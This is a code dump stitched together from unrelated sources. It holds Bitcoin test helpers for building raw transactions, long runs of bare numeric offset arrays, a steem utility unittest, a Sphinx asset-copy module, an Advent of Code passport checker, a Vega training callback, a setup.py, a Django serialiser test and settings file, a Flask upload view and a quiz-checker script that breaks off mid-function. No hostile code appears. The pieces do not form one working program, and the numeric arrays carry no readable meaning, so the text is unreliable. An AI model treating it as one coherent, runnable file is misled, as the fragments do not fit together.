while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({"txid": t["txid"], "vout": t["vout"], "address": t["address"]})
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d" % (amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out + fee
change = amount_in - amount
if change > amount * 2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change / 2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment * random.randint(0, fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount + fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransactionwithwallet(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
to_generate = int(0.5 * count) + 101
while to_generate > 0:
node.generate(min(25, to_generate))
to_generate -= 25
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in range(iterations):
t = utxos.pop()
inputs = []
inputs.append({"txid": t["txid"], "vout": t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = satoshi_round(send_value / 2)
outputs[addr2] = satoshi_round(send_value / 2)
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransactionwithwallet(raw_tx)["hex"]
node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert(len(utxos) >= count)
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
# create one script_pubkey
script_pubkey = "6a4d0200" # OP_RETURN OP_PUSH2 512 bytes
for i in range(512):
script_pubkey = script_pubkey + "01"
# concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change
txouts = "81"
for k in range(128):
# add txout value
txouts = txouts + "0000000000000000"
# add length of script_pubkey
txouts = txouts + "fd0402"
# add script_pubkey
txouts = txouts + script_pubkey
return txouts
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, num, fee):
addr = node.getnewaddress()
txids = []
for _ in range(num):
t = utxos.pop()
inputs = [{"txid": t["txid"], "vout": t["vout"]}]
outputs = {}
change = t['amount'] - fee
outputs[addr] = satoshi_round(change)
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + txouts
newtx = newtx + rawtx[94:]
signresult = node.signrawtransactionwithwallet(newtx, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
txids.append(txid)
return txids
def mine_large_block(node, utxos=None):
# generate a 66k transaction,
# and 14 of them is close to the 1MB block limit
num = 14
txouts = gen_return_txouts()
utxos = utxos if utxos is not None else []
if len(utxos) < num:
utxos.clear()
utxos.extend(node.listunspent())
fee = 100 * node.getnetworkinfo()["relayfee"]
create_lots_of_big_transactions(node, txouts, utxos, num, fee=fee)
node.generate(1)
def find_vout_for_address(node, txid, addr):
"""
Locate the vout index of the given transaction sending to the
given address. Raises runtime error exception if not found.
"""
tx = node.getrawtransaction(txid, True)
for i in range(len(tx["vout"])):
if any([addr == a for a in tx["vout"][i]["scriptPubKey"]["addresses"]]):
return i
raise RuntimeError("Vout not found for address: txid=%s, addr=%s" % (txid, addr))
| [
[
[
281,
290
],
[
7944,
7953
]
],
[
[
312,
319
],
[
7610,
7617
]
],
[
[
321,
330
],
[
7870,
7879
]
],
[
[
351,
358
],
[
7298,
7305
],
[
8033,
8040
],
[
8058,
8065
],
[
16784,
16791
],
[
17587,
17594
],
[
17616,
17623
]
],
[
[
360,
370
],
[
8090,
8100
],
[
17648,
17658
]
],
[
[
378,
385
],
[
7681,
7688
],
[
7740,
7747
]
],
[
[
393,
400
],
[
8664,
8671
]
],
[
[
408,
412
],
[
7346,
7350
],
[
7357,
7361
]
],
[
[
420,
427
],
[
608,
615
]
],
[
[
435,
437
],
[
10928,
10930
],
[
10960,
10962
],
[
10995,
10997
],
[
11407,
11409
],
[
11419,
11421
],
[
11475,
11477
],
[
11487,
11489
],
[
11600,
11602
],
[
11691,
11693
],
[
11902,
11904
],
[
11917,
11919
],
[
11979,
11981
],
[
12484,
12486
],
[
12499,
12501
],
[
12548,
12550
],
[
12558,
12560
],
[
12603,
12605
],
[
12631,
12633
],
[
13078,
13080
],
[
13093,
13095
],
[
13201,
13203
],
[
13211,
13213
]
],
[
[
445,
451
],
[
16732,
16738
],
[
18009,
18015
],
[
18044,
18050
],
[
18101,
18107
]
],
[
[
459,
461
],
[
5809,
5811
]
],
[
[
485,
503
],
[
3098,
3116
]
],
[
[
511,
515
],
[
8302,
8306
],
[
8358,
8362
],
[
8575,
8579
],
[
8925,
8929
],
[
14992,
14996
],
[
15024,
15028
],
[
15211,
15215
],
[
15528,
15532
],
[
15560,
15564
],
[
15865,
15869
]
],
[
[
531,
539
],
[
10063,
10071
],
[
10157,
10165
]
],
[
[
563,
579
],
[
9950,
9966
]
],
[
[
581,
597
],
[
1871,
1887
],
[
4694,
4710
],
[
13703,
13719
]
],
[
[
599,
605
],
[
8705,
8711
],
[
13147,
13153
]
],
[
[
693,
710
]
],
[
[
1180,
1192
],
[
6342,
6354
]
],
[
[
1384,
1403
]
],
[
[
1521,
1549
]
],
[
[
1665,
1678
]
],
[
[
1767,
1788
],
[
1709,
1730
]
],
[
[
2325,
2352
]
],
[
[
3417,
3440
]
],
[
[
4454,
4461
],
[
4383,
4390
]
],
[
[
5288,
5308
]
],
[
[
5491,
5512
]
],
[
[
5953,
5972
]
],
[
[
7176,
7196
]
],
[
[
7495,
7506
]
],
[
[
7571,
7587
]
],
[
[
7649,
7656
]
],
[
[
7832,
7848
]
],
[
[
7910,
7923
]
],
[
[
7999,
8012
],
[
19245,
19258
],
[
19300,
19313
],
[
20982,
20995
]
],
[
[
8107,
8117
],
[
14066,
14076
],
[
14455,
14465
]
],
[
[
9239,
9248
],
[
10249,
10258
],
[
10287,
10296
],
[
10331,
10340
],
[
10400,
10409
],
[
10444,
10453
]
],
[
[
9301,
9309
],
[
10271,
10279
],
[
10371,
10379
]
],
[
[
9375,
9385
],
[
10314,
10324
],
[
10382,
10392
],
[
10427,
10437
]
],
[
[
9400,
9408
],
[
10299,
10307
],
[
10412,
10420
]
],
[
[
9493,
9506
]
],
[
[
10220,
10228
],
[
11158,
11166
],
[
14283,
14291
]
],
[
[
10347,
10355
],
[
10573,
10581
],
[
11212,
11220
]
],
[
[
10460,
10467
]
],
[
[
10842,
10860
]
],
[
[
11559,
11575
],
[
10888,
10904
]
],
[
[
11644,
11657
]
],
[
[
11833,
11848
],
[
10514,
10529
]
],
[
[
13042,
13060
]
],
[
[
13261,
13276
]
],
[
[
13369,
13383
]
],
[
[
13451,
13467
]
],
[
[
14208,
14221
],
[
14584,
14597
],
[
14615,
14628
]
],
[
[
14549,
14565
]
],
[
[
14647,
14658
]
],
[
[
15342,
15355
]
],
[
[
16054,
16065
]
],
[
[
16469,
16482
],
[
18159,
18172
]
],
[
[
17165,
17176
],
[
18212,
18223
]
],
[
[
17817,
17835
]
],
[
[
18664,
18686
]
],
[
[
19796,
19813
],
[
21495,
21512
]
],
[
[
20684,
20715
],
[
21704,
21735
]
],
[
[
21346,
21362
]
],
[
[
21797,
21818
]
]
] |
import unittest
from steem.utils import (
constructIdentifier,
sanitizePermlink,
derivePermlink,
resolveIdentifier,
yaml_parse_file,
formatTime,
)
class Testcases(unittest.TestCase) :
def test_constructIdentifier(self):
self.assertEqual(constructIdentifier("A", "B"), "@A/B")
def test_sanitizePermlink(self):
self.assertEqual(sanitizePermlink("aAf_0.12"), "aaf-0-12")
self.assertEqual(sanitizePermlink("[](){}"), "")
def test_derivePermlink(self):
self.assertEqual(derivePermlink("Hello World"), "hello-world")
self.assertEqual(derivePermlink("aAf_0.12"), "aaf-0-12")
self.assertEqual(derivePermlink("[](){}"), "")
def test_resolveIdentifier(self):
self.assertEqual(resolveIdentifier("@A/B"), ("A", "B"))
def test_yaml_parse_file(self):
pass
def test_formatTime(self):
self.assertEqual(formatTime(1463480746), "20160517t102546")
if __name__ == '__main__':
unittest.main()
| [
[
[
7,
15
],
[
189,
197
],
[
990,
998
]
],
[
[
46,
65
],
[
276,
295
]
],
[
[
71,
87
],
[
378,
394
],
[
445,
461
]
],
[
[
93,
107
],
[
538,
552
],
[
609,
623
],
[
674,
688
]
],
[
[
113,
130
],
[
768,
785
]
],
[
[
136,
151
]
],
[
[
157,
167
],
[
914,
924
]
],
[
[
179,
188
]
]
] |
"""File utility functions for Sphinx."""
import os
import posixpath
from typing import TYPE_CHECKING, Callable, Dict
from docutils.utils import relative_path
from sphinx.util.osutil import copyfile, ensuredir
from sphinx.util.typing import PathMatcher
if TYPE_CHECKING:
from sphinx.util.template import BaseRenderer
def copy_asset_file(source: str, destination: str,
context: Dict = None, renderer: "BaseRenderer" = None) -> None:
"""Copy an asset file to destination.
On copying, it expands the template variables if context argument is given and
the asset is a template file.
:param source: The path to source file
:param destination: The path to destination file or directory
:param context: The template variables. If not given, template files are simply copied
:param renderer: The template engine. If not given, SphinxRenderer is used by default
"""
if not os.path.exists(source):
return
if os.path.isdir(destination):
# Use source filename if destination points a directory
destination = os.path.join(destination, os.path.basename(source))
if source.lower().endswith('_t') and context is not None:
if renderer is None:
from sphinx.util.template import SphinxRenderer
renderer = SphinxRenderer()
with open(source, encoding='utf-8') as fsrc:
if destination.lower().endswith('_t'):
destination = destination[:-2]
with open(destination, 'w', encoding='utf-8') as fdst:
fdst.write(renderer.render_string(fsrc.read(), context))
else:
copyfile(source, destination)
def copy_asset(source: str, destination: str, excluded: PathMatcher = lambda path: False,
context: Dict = None, renderer: "BaseRenderer" = None,
onerror: Callable[[str, Exception], None] = None) -> None:
"""Copy asset files to destination recursively.
On copying, it expands the template variables if context argument is given and
the asset is a template file.
:param source: The path to source file or directory
:param destination: The path to destination directory
:param excluded: The matcher to determine the given path should be copied or not
:param context: The template variables. If not given, template files are simply copied
:param renderer: The template engine. If not given, SphinxRenderer is used by default
:param onerror: The error handler.
"""
if not os.path.exists(source):
return
if renderer is None:
from sphinx.util.template import SphinxRenderer
renderer = SphinxRenderer()
ensuredir(destination)
if os.path.isfile(source):
copy_asset_file(source, destination, context, renderer)
return
for root, dirs, files in os.walk(source, followlinks=True):
reldir = relative_path(source, root)
for dir in dirs[:]:
if excluded(posixpath.join(reldir, dir)):
dirs.remove(dir)
else:
ensuredir(posixpath.join(destination, reldir, dir))
for filename in files:
if not excluded(posixpath.join(reldir, filename)):
try:
copy_asset_file(posixpath.join(root, filename),
posixpath.join(destination, reldir),
context, renderer)
except Exception as exc:
if onerror:
onerror(posixpath.join(root, filename), exc)
else:
raise
| [
[
[
49,
51
],
[
933,
935
],
[
980,
982
],
[
1094,
1096
],
[
1120,
1122
],
[
2525,
2527
],
[
2717,
2719
],
[
2850,
2852
]
],
[
[
59,
68
],
[
2982,
2991
],
[
3089,
3098
],
[
3191,
3200
],
[
3283,
3292
],
[
3351,
3360
],
[
3548,
3557
]
],
[
[
88,
101
],
[
259,
272
]
],
[
[
103,
111
],
[
1864,
1872
]
],
[
[
113,
117
],
[
406,
410
],
[
1794,
1798
]
],
[
[
146,
159
],
[
2902,
2915
]
],
[
[
192,
200
],
[
1648,
1656
]
],
[
[
202,
211
],
[
2687,
2696
],
[
3079,
3088
]
],
[
[
243,
254
],
[
1736,
1747
]
],
[
[
311,
323
]
],
[
[
330,
345
],
[
2749,
2764
],
[
3267,
3282
]
],
[
[
1684,
1694
]
]
] |
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Marc Anthony Reyes and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestGame(unittest.TestCase):
pass
| [
[
[
123,
139
]
],
[
[
148,
154
]
],
[
[
162,
170
],
[
187,
195
]
],
[
[
178,
186
]
]
] |
#!/bin/env python3
def puzzle2():
entries = set()
allowed1 = {"byr", "iyr", "eyr", "hgt", "hcl", "ecl", "pid"}
valid = 0
# Read in all the rules
with open('input.txt', 'r') as input:
l = 0
for line in input:
l += 1
if line == "\n":
# print(entries)
if len(allowed1 & entries) == 7:
valid += 1
entries = set()
else:
keyval = line.split(' ')
for i in keyval:
(key, val) = i.split(':')
if val[-1:] == '\n':
val = val[:-1]
if key == "byr":
val = int(val)
if val >= 1920 and val <= 2002:
entries.add(key)
else:
print('{} byr'.format(l))
if key == "iyr":
val = int(val)
if val >= 2010 and val <= 2020:
entries.add(key)
else:
print('{} iyr'.format(l))
if key == "eyr":
val = int(val)
if val >= 2020 and val <= 2030:
entries.add(key)
else:
print('{} eyr'.format(l))
if key == "hgt":
if val[-2:] == "cm":
val = int(val[:-2])
if val >= 150 and val <= 193:
entries.add(key)
else:
print('{} hgt'.format(l))
elif val[-2:] == "in":
val = int(val[:-2])
if val >= 59 and val <= 76:
entries.add(key)
else:
print('{} hgt'.format(l))
if key == "hcl":
if val[0] == '#':
val = val[1:]
check = 0
for c in val:
if c in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'a', 'b', 'c', 'd', 'e', 'f']:
check += 1
if check == 6:
entries.add(key)
else:
print('{} hcl'.format(l))
if key == "ecl":
if val in ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']:
entries.add(key)
else:
print('{} ecl'.format(l))
if key == "pid":
check = 0
for c in val:
if c in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']:
check += 1
if check == 9:
entries.add(key)
else:
print('{} pid'.format(l))
if len(allowed1 & entries) == 7:
valid += 1
print(valid)
if __name__ == "__main__":
puzzle2()
| [
[
[
23,
30
],
[
3389,
3396
]
]
] |
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""AutoGate top-k version Stage2 TrainerCallback."""
import logging
import pandas as pd
from vega.common import ClassFactory, ClassType
from vega.common import FileOps
from vega.algorithms.nas.fis.ctr_trainer_callback import CtrTrainerCallback
from vega.core.pipeline.conf import ModelConfig
logger = logging.getLogger(__name__)
@ClassFactory.register(ClassType.CALLBACK)
class AutoGateS2TrainerCallback(CtrTrainerCallback):
"""AutoGateS2TrainerCallback module."""
def __init__(self):
"""Construct AutoGateS2TrainerCallback class."""
super(CtrTrainerCallback, self).__init__()
self.sieve_board = pd.DataFrame(
columns=['selected_feature_pairs', 'score'])
self.selected_pairs = list()
logging.info("init autogate s2 trainer callback")
def before_train(self, logs=None):
"""Call before_train of the managed callbacks."""
super().before_train(logs)
"""Be called before the training process."""
hpo_result = FileOps.load_pickle(FileOps.join_path(
self.trainer.local_output_path, 'best_config.pickle'))
logging.info("loading stage1_hpo_result \n{}".format(hpo_result))
feature_interaction_score = hpo_result['feature_interaction_score']
print('feature_interaction_score:', feature_interaction_score)
sorted_pairs = sorted(feature_interaction_score.items(),
key=lambda x: abs(x[1]), reverse=True)
if ModelConfig.model_desc:
fis_ratio = ModelConfig.model_desc["custom"]["fis_ratio"]
else:
fis_ratio = 1.0
top_k = int(len(feature_interaction_score) * min(1.0, fis_ratio))
self.selected_pairs = list(map(lambda x: x[0], sorted_pairs[:top_k]))
# add selected_pairs
setattr(ModelConfig.model_desc['custom'], 'selected_pairs', self.selected_pairs)
def after_train(self, logs=None):
"""Call after_train of the managed callbacks."""
curr_auc = float(self.trainer.valid_metrics.results['auc'])
self.sieve_board = self.sieve_board.append(
{
'selected_feature_pairs': self.selected_pairs,
'score': curr_auc
}, ignore_index=True)
result_file = FileOps.join_path(
self.trainer.local_output_path, '{}_result.csv'.format(self.trainer.__worker_id__))
self.sieve_board.to_csv(result_file, sep='\t')
| [
[
[
508,
515
],
[
757,
764
],
[
1218,
1225
],
[
1599,
1606
]
],
[
[
524,
536
],
[
1097,
1099
]
],
[
[
562,
574
],
[
791,
803
]
],
[
[
576,
585
],
[
813,
822
]
],
[
[
611,
618
],
[
1483,
1490
],
[
1503,
1510
],
[
2776,
2783
]
],
[
[
677,
695
],
[
866,
884
],
[
1032,
1050
]
],
[
[
733,
744
],
[
1966,
1977
],
[
2015,
2026
],
[
2308,
2319
]
],
[
[
748,
754
]
],
[
[
840,
865
]
]
] |
from setuptools import setup, find_packages
with open("README.md", "r", encoding="utf-8") as f:
long_description = f.read()
setup_requirements = [
"wheel>=0.35.1",
]
requirements = ["Pillow>=7.2.0"]
test_requirements = [
"flake8>=3.8.3",
"pytest>=5.4.3",
]
dev_requirements = [
*setup_requirements,
*test_requirements,
]
extra_requirements = {
"setup": setup_requirements,
"test": test_requirements,
"all": [*requirements, *dev_requirements,],
}
setup(
name="image-scramble",
version="2.0.1",
author="catsital",
author_email="catshital@gmail.com",
description="Split image into tiles and scramble/unscramble them with seed.",
entry_points={"console_scripts": ["pycasso=pycasso.__main__:main"],},
install_requires=requirements,
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/catsital/pycasso",
project_urls={
"Bug Tracker": "https://github.com/catsital/pycasso/issues",
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
packages=find_packages(),
setup_requires=setup_requirements,
tests_require=test_requirements,
extras_require=extra_requirements,
zip_safe=False
)
| [
[
[
23,
28
],
[
489,
494
]
],
[
[
30,
43
],
[
1211,
1224
]
],
[
[
94,
95
],
[
120,
121
]
],
[
[
101,
117
],
[
819,
835
]
],
[
[
130,
148
],
[
304,
322
],
[
387,
405
],
[
1247,
1265
]
],
[
[
177,
189
],
[
451,
463
],
[
784,
796
]
],
[
[
211,
228
],
[
329,
346
],
[
419,
436
],
[
1285,
1302
]
],
[
[
278,
294
],
[
466,
482
]
],
[
[
351,
369
],
[
1323,
1341
]
]
] |
from collections import OrderedDict
import pytest
from company.constants import RegistrationNumberChoices
from company.models import Country
from company.serialisers import CompanySerialiser
from .factories import CompanyFactory, IndustryCodeFactory, PrimaryIndustryCodeFactory, RegistrationNumberFactory
@pytest.mark.django_db
def test_company_serialiser():
company = CompanyFactory(**{
'duns_number': '123456789',
'primary_name': 'Test Company 1',
'trading_names': ['ACME trading corp'],
'global_ultimate_duns_number': '888888888',
'global_ultimate_primary_name': 'global primary name',
'domain': 'www.e-corp.corp',
'is_out_of_business': False,
'address_line_1': 'The Old Test Mill 1',
'address_line_2': '100 Test Rd',
'address_town': 'Cheshire',
'address_county': 'address county',
'address_area_name': 'address area name',
'address_area_abbrev_name': 'abr',
'address_postcode': 'address postcode',
'address_country': Country.objects.get(iso_alpha2='GB'),
'registered_address_line_1': 'reg address line 1',
'registered_address_line_2': 'reg address line 2',
'registered_address_town': 'reg address town',
'registered_address_county': 'reg address county',
'registered_address_area_name': 'reg address area name',
'registered_address_area_abbrev_name': 'abr',
'registered_address_country': Country.objects.get(iso_alpha2='GB'),
'registered_address_postcode': 'reg postcode',
'annual_sales': 51806612000,
'annual_sales_currency': 'USD',
'is_annual_sales_estimated': None,
'employee_number': 24,
'year_started': 2000,
'is_employees_number_estimated': False,
'legal_status': 'foreign_company'
})
RegistrationNumberFactory(**{
'company': company,
'registration_type': RegistrationNumberChoices.uk_vat_number,
'registration_number': '12341234',
})
IndustryCodeFactory(**{
'company': company,
'code': '517919',
'description': 'All Other Telecommunications',
'typeDescription': 'North American Industry Classification System 2017',
'typeDnBCode': 30832,
'priority': 2
})
IndustryCodeFactory(**{
'company': company,
'code': '423690',
'description': 'Other Electronic Parts and Equipment Merchant Wholesalers',
'typeDescription': 'North American Industry Classification System 2017',
'typeDnBCode': 30832,
'priority': 1
})
PrimaryIndustryCodeFactory(**{
'company': company,
'usSicV4': '5065',
'usSicV4Description': 'Whol electronic parts/equipment'
})
assert CompanySerialiser(company).data == {
'last_updated': None,
'duns_number': '123456789',
'primary_name': 'Test Company 1',
'trading_names': ['ACME trading corp'],
'registration_numbers': [
OrderedDict(
[
('registration_type', 'VAT Registration number'),
('registration_number', '12341234'),
]
)
],
'global_ultimate_duns_number': '888888888',
'global_ultimate_primary_name': 'global primary name',
'domain': 'www.e-corp.corp',
'is_out_of_business': False,
'address_line_1': 'The Old Test Mill 1',
'address_line_2': '100 Test Rd',
'address_town': 'Cheshire',
'address_county': 'address county',
'address_area_name': 'address area name',
'address_area_abbrev_name': 'abr',
'address_postcode': 'address postcode',
'address_country': 'GB',
'registered_address_line_1': 'reg address line 1',
'registered_address_line_2': 'reg address line 2',
'registered_address_town': 'reg address town',
'registered_address_county': 'reg address county',
'registered_address_area_name': 'reg address area name',
'registered_address_area_abbrev_name': 'abr',
'registered_address_country': 'GB',
'registered_address_postcode': 'reg postcode',
'annual_sales': 51806612000.0,
'annual_sales_currency': 'USD',
'is_annual_sales_estimated': None,
'employee_number': 24,
'is_employees_number_estimated': False,
'primary_industry_codes': [
OrderedDict([
('usSicV4', '5065'),
('usSicV4Description', 'Whol electronic parts/equipment'),
])
],
'industry_codes': [
OrderedDict(
[
('code', '423690'),
('description', 'Other Electronic Parts and Equipment Merchant Wholesalers'),
('priority', 1),
('typeDescription', 'North American Industry Classification System 2017'),
('typeDnBCode', '30832'),
]
),
OrderedDict(
[
('code', '517919'),
('description', 'All Other Telecommunications'),
('priority', 2),
('typeDescription', 'North American Industry Classification System 2017'),
('typeDnBCode', '30832'),
]
)
],
'line_of_business': '',
'year_started': 2000,
'legal_status': 'foreign_company'
}
| [
[
[
24,
35
],
[
3029,
3040
],
[
4462,
4473
],
[
4654,
4665
],
[
5046,
5057
]
],
[
[
44,
50
],
[
310,
316
]
],
[
[
82,
107
],
[
1940,
1965
]
],
[
[
135,
142
],
[
1049,
1056
],
[
1477,
1484
]
],
[
[
175,
192
],
[
2790,
2807
]
],
[
[
216,
230
],
[
377,
391
]
],
[
[
232,
251
],
[
2036,
2055
],
[
2314,
2333
]
],
[
[
253,
279
],
[
2621,
2647
]
],
[
[
281,
306
],
[
1853,
1878
]
],
[
[
336,
359
]
]
] |
"""
Django settings for drf_sample project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import sys
import os
sys.path.append('/fan/')
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ov0!!1=grqmn-1^gdcm87a+=al3)(t9xnionsx)*&oe&3l+x4*'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'drf_app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'fan.contrib.django.FanMiddleware',
]
ROOT_URLCONF = 'drf_sample.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'drf_sample.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'
},
},
'handlers': {
'default': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': 'default.log',
'formatter': 'standard',
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': 'DEBUG',
'propagate': True,
},
},
}
| [
[
[
320,
323
],
[
335,
338
]
],
[
[
331,
333
],
[
444,
446
],
[
460,
462
],
[
476,
478
],
[
2323,
2325
]
],
[
[
433,
441
],
[
2336,
2344
]
],
[
[
710,
720
]
],
[
[
843,
848
]
],
[
[
857,
870
]
],
[
[
904,
918
]
],
[
[
1127,
1137
]
],
[
[
1581,
1593
]
],
[
[
1615,
1624
]
],
[
[
2100,
2116
]
],
[
[
2228,
2237
]
],
[
[
2474,
2498
]
],
[
[
2978,
2991
]
],
[
[
3003,
3012
]
],
[
[
3022,
3030
]
],
[
[
3039,
3047
]
],
[
[
3056,
3062
]
],
[
[
3175,
3185
]
],
[
[
3200,
3207
]
]
] |
import os
from flask import render_template, url_for, redirect
from werkzeug.utils import secure_filename
from app import app
from app.forms import ScriptForm
from Script_reader import table_creator
@app.route('/', methods=['POST', 'GET'])
@app.route('/index', methods=['POST', 'GET'])
def index():
form = ScriptForm()
if form.validate_on_submit():
f = form.script.data
filename = secure_filename(f.filename)
file_path = os.path.join(app.instance_path, 'scripts', filename)
f.save(os.path.join(app.instance_path, 'scripts', filename))
table = table_creator(file_path).get_html_string()
os.remove(file_path)
return table
return render_template('index.html', title='Home', form=form)
@app.route('/locations', methods=['POST', 'GET'])
def locations():
pass
#Perhaps use http://flask.pocoo.org/docs/0.12/api/#flask.send_from_directory to allow a CSV to be downloaded.
| [
[
[
7,
9
],
[
456,
458
],
[
524,
526
],
[
645,
647
]
],
[
[
28,
43
],
[
698,
713
]
],
[
[
45,
52
]
],
[
[
54,
62
]
],
[
[
90,
105
],
[
408,
423
]
],
[
[
123,
126
],
[
203,
206
],
[
244,
247
],
[
755,
758
],
[
469,
472
],
[
537,
540
]
],
[
[
149,
159
],
[
313,
323
]
],
[
[
186,
199
],
[
594,
607
]
],
[
[
293,
298
]
],
[
[
808,
817
]
]
] |
import pandas as pd
import numpy as np
from collections import defaultdict
import RemovingDataSolns as s
# Question 1
def prop_sals_test(prop_sals):
'''
INPUT prop_sals - a float as the percent of missing values in the salary column
Prints statement related to the correctness of the solution of the proportion
'''
if np.allclose(prop_sals, s.prop_sals):
print("Nice job! That looks right!")
else:
print("Oops! Make sure your value is for the proportion of nan values in only the Salary column.")
# Question 2
def sal_rm_test(sal_rm):
'''
INPUT sal_rm - a pandas dataframe with all rows that are missing a value the salary column removed. The dataframe should only have the columns of num_vars (quant variables)
Prints statement related to the correctness of the solution of the dataframe
'''
if sal_rm.equals(s.sal_rm):
print("Nice job! That looks right!")
else:
print("That wasn't quite as expected. Try again, this should be the num_vars dataframe with salary removed.")
# Question 3
def question3_check(question3_solution):
'''
    INPUT question3_solution - the letter (a, b, or c) corresponding to the statement that best describes what happened when fitting your model.
Prints statement related to the correctness of the letter chosen.
'''
if question3_solution == s.question3_solution:
print("Nice job! That's right! Those missing values in the X matrix will still not allow us to predict the response.")
else:
print("Oops! That wasn't what we were expecting. Your solution should be either a, b, or c for the string that best relates to what happened.")
# Question 4
def all_rm_test(all_rm):
'''
INPUT all_rm - a pandas dataframe with all rows that are missing a value in any column removed from num_vars (only the numeric columns)
Prints statement related to the correctness of the solution of the dataframe
'''
if all_rm.equals(s.all_rm):
print("Nice job! That looks right. The default is to drop any row with a missing value in any column, so we didn't need to specify any arguments in this case.")
else:
print("Oops! That doesn't look like what we were expecting. Make sure you are working with only the numeric columns, and you have dropped any rows with missing values.")
# Question 5
def question5_check(question5_solution):
'''
    INPUT question5_solution - the letter (a, b, or c) corresponding to the statement that best describes what happened when fitting your model.
Prints statement related to the correctness of the letter chosen.
'''
if question5_solution == s.question5_solution:
print("Nice job! That's right! Python isn't exactly magic, but sometimes it feels like it is!")
else:
